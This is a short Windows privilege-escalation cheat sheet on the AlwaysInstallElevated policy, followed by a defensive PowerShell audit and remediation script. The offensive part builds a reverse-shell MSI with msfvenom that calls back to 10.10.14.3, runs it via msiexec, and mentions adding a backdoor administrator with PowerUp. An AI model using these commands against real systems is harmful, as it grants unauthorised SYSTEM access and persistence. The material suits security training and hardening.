AlwaysInstallElevated

Overview

AlwaysInstallElevated is a Windows Installer policy that, when enabled, installs every MSI package with SYSTEM privileges, no matter which user launches it. Wheels spinning?

Elevation via AlwaysInstallElevated

Query the registry for the misconfiguration

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

The machine is vulnerable only if the AlwaysInstallElevated value is set to 1 under both keys.

Create a malicious msi file

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=1338 -f msi -o rev.msi

Pop a shell

msiexec /i rev.msi

Quick Win

You can get a quick win by using the Write-UserAddMSI function from PowerUp.

This function will add a backdoor user to the Local Administrators group.

An RDP session is required for this.
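
The registry check from the first step, written as a defensive audit with a remediation helper. This is an added example, not code from the original page or from PowerUp; the function names are hypothetical, and it only inspects the current user's HKCU hive.

```powershell
# Added example: audit the AlwaysInstallElevated policy in both hives.
# Function names are hypothetical (not from PowerUp or any other tool).
$InstallerPolicyKeys = @(
    'HKLM:\Software\Policies\Microsoft\Windows\Installer',
    'HKCU:\Software\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # Returns one object per hive; a missing key or value counts as "not set".
    foreach ($key in $InstallerPolicyKeys) {
        $value = $null
        if (Test-Path -Path $key) {
            $value = (Get-ItemProperty -Path $key -Name AlwaysInstallElevated `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{
            Key     = $key
            Value   = $value
            Enabled = ($value -eq 1)
        }
    }
}

function Test-AlwaysInstallElevated {
    # The machine is exposed only when the value is 1 in BOTH hives.
    $state = @(Get-AlwaysInstallElevatedState)
    return (@($state | Where-Object { $_.Enabled }).Count -eq $state.Count)
}

function Disable-AlwaysInstallElevated {
    # Sets the value to 0 wherever it exists. HKLM requires an elevated prompt.
    foreach ($key in $InstallerPolicyKeys) {
        if (Get-ItemProperty -Path $key -Name AlwaysInstallElevated -ErrorAction SilentlyContinue) {
            Set-ItemProperty -Path $key -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

Get-AlwaysInstallElevatedState | Format-Table -AutoSize
if (Test-AlwaysInstallElevated) {
    Write-Warning 'AlwaysInstallElevated is 1 in HKLM and HKCU: any user can install MSI packages as SYSTEM.'
} else {
    Write-Output 'AlwaysInstallElevated is not enabled in both hives.'
}
```

If the values come from Group Policy ("Always install with elevated privileges" under Windows Components > Windows Installer, in both Computer and User Configuration), disable the setting in the GPO, because a local registry change is overwritten at the next policy refresh.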
